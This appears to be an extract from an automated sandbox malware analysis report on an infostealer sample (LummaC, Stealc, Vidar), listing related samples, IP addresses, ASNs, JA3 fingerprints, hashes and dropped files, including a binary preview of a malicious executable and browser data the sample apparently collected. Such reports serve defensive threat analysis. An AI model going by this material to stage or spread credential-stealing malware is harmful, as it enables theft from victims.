                                                                                                                                                                                                                      FileApp.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig, zgRATBrowse
                                                                                                                                                                                                                      • 104.26.2.46
                                                                                                                                                                                                                      kqS23MOytx.exeGet hashmaliciousSocks5Systemz, Stealc, Vidar, XWorm, XmrigBrowse
                                                                                                                                                                                                                      • 104.26.3.46
                                                                                                                                                                                                                      abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeGet hashmaliciousCryptOne, Nymaim, PrivateLoader, RedLine, SmokeLoader, onlyLoggerBrowse
                                                                                                                                                                                                                      • 172.67.132.113
                                                                                                                                                                                                                      ExeFile (331).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.67.132.113
                                                                                                                                                                                                                      mysterisop.sitefile.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 172.67.195.67
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 104.21.21.3
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 172.67.195.67
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 104.21.21.3
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 172.67.195.67
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.21.3

                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      CLOUDFLARENETUSl5pPoBu9i3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.67.178.253
                                                                                                                                                                                                                      z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                                                                      http://www.freemangas.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.67.74.221
                                                                                                                                                                                                                      caZq8MavwF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.67.178.253
                                                                                                                                                                                                                      http://freemangas.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.26.11.241
                                                                                                                                                                                                                      72LZTFDM58.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.67.178.253
                                                                                                                                                                                                                      https://app.glorify.com/file/1193241?format=90Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                      • 172.67.181.150
                                                                                                                                                                                                                      ODzRw7AnvO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.21.67.172
                                                                                                                                                                                                                      12DF9V3Skv.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.67.178.253
                                                                                                                                                                                                                      CLOUDFLARENETUSl5pPoBu9i3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.67.178.253
                                                                                                                                                                                                                      z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                                                                      http://www.freemangas.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.67.74.221
                                                                                                                                                                                                                      caZq8MavwF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.67.178.253
                                                                                                                                                                                                                      http://freemangas.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.26.11.241
                                                                                                                                                                                                                      72LZTFDM58.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.67.178.253
                                                                                                                                                                                                                      https://app.glorify.com/file/1193241?format=90Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                      • 172.67.181.150
                                                                                                                                                                                                                      ODzRw7AnvO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.21.67.172
                                                                                                                                                                                                                      12DF9V3Skv.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.67.178.253
                                                                                                                                                                                                                      FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfile.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 46.8.231.109
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 46.8.231.109
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 46.8.231.109
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 46.8.231.109
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 46.8.231.109
                                                                                                                                                                                                                      6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 46.8.231.109
                                                                                                                                                                                                                      hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 46.8.231.109
                                                                                                                                                                                                                      N83LFtMTUS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 46.8.231.109
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 46.8.231.109
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 46.8.231.109
                                                                                                                                                                                                                      HETZNER-ASDE7ffbfc130000.conhost2.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 195.201.21.34
                                                                                                                                                                                                                      7ffbfc130000.conhost2.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 195.201.21.34
                                                                                                                                                                                                                      VOqg4bXfFS.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 195.201.21.34
                                                                                                                                                                                                                      tZlDJKdfV6.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 195.201.21.34
                                                                                                                                                                                                                      7ff6c1d70000.xxtlz.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 195.201.21.34
                                                                                                                                                                                                                      Y1kJT9dEK1.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 195.201.21.34
                                                                                                                                                                                                                      7ff6c1d70000.xxtlz.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 195.201.21.34
                                                                                                                                                                                                                      VOqg4bXfFS.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 195.201.21.34
                                                                                                                                                                                                                      tZlDJKdfV6.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 195.201.21.34
                                                                                                                                                                                                                      Y1kJT9dEK1.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 195.201.21.34

                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0ez92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                      • 172.67.140.92
                                                                                                                                                                                                                      SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                      • 172.67.140.92
                                                                                                                                                                                                                      hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                      • 172.67.140.92
                                                                                                                                                                                                                      zR0pDxPfkZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                      • 172.67.140.92
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 172.67.140.92
                                                                                                                                                                                                                      WaUjTT0Wa1.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                                                                                      • 172.67.140.92
                                                                                                                                                                                                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                                                                                      • 172.67.140.92
                                                                                                                                                                                                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                                                                                      • 172.67.140.92
                                                                                                                                                                                                                      PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                                                                                                                                                                      • 172.67.140.92
                                                                                                                                                                                                                      404.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.67.140.92
                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 104.21.17.174
                                                                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                                                                      • 172.67.195.67
                                                                                                                                                                                                                      • 104.21.56.150
                                                                                                                                                                                                                      • 104.26.3.46
                                                                                                                                                                                                                      • 104.21.18.193
                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                      • 172.67.208.141
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 104.21.16.12
                                                                                                                                                                                                                      • 173.231.16.77
                                                                                                                                                                                                                      • 172.67.184.196
                                                                                                                                                                                                                      FA_41_09_2024_.PDFGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.21.17.174
                                                                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                                                                      • 172.67.195.67
                                                                                                                                                                                                                      • 104.21.56.150
                                                                                                                                                                                                                      • 104.26.3.46
                                                                                                                                                                                                                      • 104.21.18.193
                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                      • 172.67.208.141
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 104.21.16.12
                                                                                                                                                                                                                      • 173.231.16.77
                                                                                                                                                                                                                      • 172.67.184.196
                                                                                                                                                                                                                      b222.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.17.174
                                                                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                                                                      • 172.67.195.67
                                                                                                                                                                                                                      • 104.21.56.150
                                                                                                                                                                                                                      • 104.26.3.46
                                                                                                                                                                                                                      • 104.21.18.193
                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                      • 172.67.208.141
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 104.21.16.12
                                                                                                                                                                                                                      • 173.231.16.77
                                                                                                                                                                                                                      • 172.67.184.196
                                                                                                                                                                                                                      AMG Cargo Logistic.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.21.17.174
                                                                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                                                                      • 172.67.195.67
                                                                                                                                                                                                                      • 104.21.56.150
                                                                                                                                                                                                                      • 104.26.3.46
                                                                                                                                                                                                                      • 104.21.18.193
                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                      • 172.67.208.141
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 104.21.16.12
                                                                                                                                                                                                                      • 173.231.16.77
                                                                                                                                                                                                                      • 172.67.184.196
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 104.21.17.174
                                                                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                                                                      • 172.67.195.67
                                                                                                                                                                                                                      • 104.21.56.150
                                                                                                                                                                                                                      • 104.26.3.46
                                                                                                                                                                                                                      • 104.21.18.193
                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                      • 172.67.208.141
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 104.21.16.12
                                                                                                                                                                                                                      • 173.231.16.77
                                                                                                                                                                                                                      • 172.67.184.196
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 104.21.17.174
                                                                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                                                                      • 172.67.195.67
                                                                                                                                                                                                                      • 104.21.56.150
                                                                                                                                                                                                                      • 104.26.3.46
                                                                                                                                                                                                                      • 104.21.18.193
                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                      • 172.67.208.141
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 104.21.16.12
                                                                                                                                                                                                                      • 173.231.16.77
                                                                                                                                                                                                                      • 172.67.184.196
                                                                                                                                                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                                      • 104.21.17.174
                                                                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                                                                      • 172.67.195.67
                                                                                                                                                                                                                      • 104.21.56.150
                                                                                                                                                                                                                      • 104.26.3.46
                                                                                                                                                                                                                      • 104.21.18.193
                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                      • 172.67.208.141
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 104.21.16.12
                                                                                                                                                                                                                      • 173.231.16.77
                                                                                                                                                                                                                      • 172.67.184.196
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 104.21.17.174
                                                                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                                                                      • 172.67.195.67
                                                                                                                                                                                                                      • 104.21.56.150
                                                                                                                                                                                                                      • 104.26.3.46
                                                                                                                                                                                                                      • 104.21.18.193
                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                      • 172.67.208.141
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 104.21.16.12
                                                                                                                                                                                                                      • 173.231.16.77
                                                                                                                                                                                                                      • 172.67.184.196
                                                                                                                                                                                                                      Google_Chrome.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.17.174
                                                                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                                                                      • 172.67.195.67
                                                                                                                                                                                                                      • 104.21.56.150
                                                                                                                                                                                                                      • 104.26.3.46
                                                                                                                                                                                                                      • 104.21.18.193
                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                      • 172.67.208.141
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 104.21.16.12
                                                                                                                                                                                                                      • 173.231.16.77
                                                                                                                                                                                                                      • 172.67.184.196
                                                                                                                                                                                                                      https://finalstepgetshere.com/uploads/beta111.zipGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                                                                      • 104.21.17.174
                                                                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                                                                      • 172.67.195.67
                                                                                                                                                                                                                      • 104.21.56.150
                                                                                                                                                                                                                      • 104.26.3.46
                                                                                                                                                                                                                      • 104.21.18.193
                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                      • 172.67.208.141
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 104.21.16.12
                                                                                                                                                                                                                      • 173.231.16.77
                                                                                                                                                                                                                      • 172.67.184.196
                                                                                                                                                                                                                      51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 49.12.197.9
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 49.12.197.9
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 49.12.197.9
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 49.12.197.9
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 49.12.197.9
                                                                                                                                                                                                                      6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 49.12.197.9
                                                                                                                                                                                                                      hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 49.12.197.9
                                                                                                                                                                                                                      N83LFtMTUS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 49.12.197.9
                                                                                                                                                                                                                      5FF7.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 49.12.197.9
                                                                                                                                                                                                                      5FF7.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 49.12.197.9
                                                                                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19563299efce875400a8d9b44b96597c8e-sample (1).zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      AMG Cargo Logistic.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      Cn3E2Kp2LP.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      Cn3E2Kp2LP.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      setup.ic19.exeGet hashmaliciousGhostRat, NitolBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 104.102.49.254

                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      C:\ProgramData\EBAEBFIIEC.exefile.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                                C:\ProgramData\FIEHIIIJDA.exefile.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse

                                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                                          C:\ProgramData\AFIIEBGCAAEC\JEHIDH

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                                          Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\AFIIEBGCAAEC\KEGCBK

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                          Entropy (8bit):0.8508558324143882
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                                                                          MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\AKKECAFBFHJDGDHIEHJD

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):10237
                                                                                                                                                                                                                                          Entropy (8bit):5.498288591230544
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                                                                                                                                                                                          MD5:0F58C61DE9618A1B53735181E43EE166
                                                                                                                                                                                                                                          SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                                                                                                                                                                                          SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                                                                                                                                                                                          SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                          C:\ProgramData\CFBAFBFIEHIDBGDHCGIEBAFHJJ

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                          Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\EBAEBFIIEC.exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):344992
                                                                                                                                                                                                                                          Entropy (8bit):7.9840811629834345
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:X5EAq+eU9BhaikesEDBVqaDf5kLslwEIF4TN4ha/qks1l9QjjmQ+Nb/Q5AQEO:J5vlBQB/EDBkaDRkyZIF4TN4o/29QjK0
                                                                                                                                                                                                                                          MD5:022CC85ED0F56A3F3E8AEC4AE3B80A71
                                                                                                                                                                                                                                          SHA1:A89B9C39C5F6FCB6E770CEA9491BF7A97F0F012D
                                                                                                                                                                                                                                          SHA-256:BB28BB63ED34A3B4F97A0A26BDA8A7A7C60F961010C795007EDC52576B89E4D3
                                                                                                                                                                                                                                          SHA-512:AC549B9CF50E631BAE01152DB4523FDAB55F426EE77177AF900B088244665E28DE03C10784FE9DB33A2478BEE0D96BD50E5A668D2A2BFDFF3E8706AA8F5D71A2
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ... ....@.. .......................`.......7....`.....................................S.... ..B...........x...(&...@......`................................................ ............... ..H............text........ ...................... ..`.rsrc...B.... ......................@..@.reloc.......@......................@..B........................H.......@... ..............................................................+>J]..y.. 9..=...5..t...S..4;g./.k.T.l..>GP.OC.B.$...!.xV...X.,.7.D.qRY..\.8..`M.c....6...`...D6by..e>.Ty...."lZD;...6....FN6T.^:...z._.'.._......r;...n8...Ua..<.D8..4.OvZ.2.j;o.9...;.a.}.y.R......\......`2.fv.J.C.*D.cu..'.^,b......F^I..e..H.N!...&..x..D...."...5....z.J..sE.......H....b&DI..9..Z...l.{,w.F....-. O....2...Ak.8.<.!@@a'...2...A....%.l..?.a<y.....6zZ.....'..7..Q....v>

                                                                                                                                                                                                                                          C:\ProgramData\ECBGCBGCAFII\CAAEBF

                                                                                                                                                                                                                                          Download File
